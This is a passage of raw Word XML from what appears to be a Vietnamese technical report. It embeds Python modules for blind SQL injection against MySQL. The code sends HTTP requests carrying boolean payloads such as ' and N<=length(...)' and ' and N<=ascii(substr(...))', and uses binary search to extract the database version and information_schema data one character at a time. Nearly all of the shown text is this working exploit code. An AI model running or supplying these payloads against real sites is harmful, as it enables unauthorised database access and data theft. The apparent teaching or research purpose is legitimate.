            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.checkQuery(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(result == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, x))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>x</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def checkQuery(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Return true/false of query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># If contain, return True, if not, return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Or use regex</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">r </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.sendHTTPRequest(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(r.text.find(self.basicOptions["PATTERN"]["currentSetting"]) &gt; 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>return True</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def run(self):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># We coding here</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Query ex: select version() from dual</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.runMySQLQuery("(select DESCRIPTION from information_schema.CHARACTER_SETS limit 6,1)")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00325E74" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc459374365"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Module Blind SQL injection sử dụng tìm kiếm nhị phân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>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binary search"</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lastRenderedPageBreak/>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self.maxLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>255</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 xml:space="preserve">self.basicOptions["PATTERN"] </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"currentSetting"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>None,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"required"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>True,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"description"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"Pattern to check True/False"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>}</w:t>
            </w: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imin </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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imax </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.maxLength</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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while(imin &lt;= imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imid </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>(imin + imax)/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(self.checkQuery(" and {0}&lt;=length({1})".format(imid,query)) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># &lt; key</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>imid</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 xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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t>if(imin == imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return imin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(imax == 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return None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 xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>temp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return temp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>def getMySQLVersion(self):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Query = version()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.info("Get MySQL version")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.runMySQLQuery("version()")</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 Binary search</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 Single character</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>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r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.maxLength</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>while(imin &lt;= imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imid </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>(imin + imax)/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(self.checkQuery(" and {0}&lt;=ascii(substr({1},{2},1))".format(imid,query, (i+1))) == True):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&lt; key</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imin </w:t>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temp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
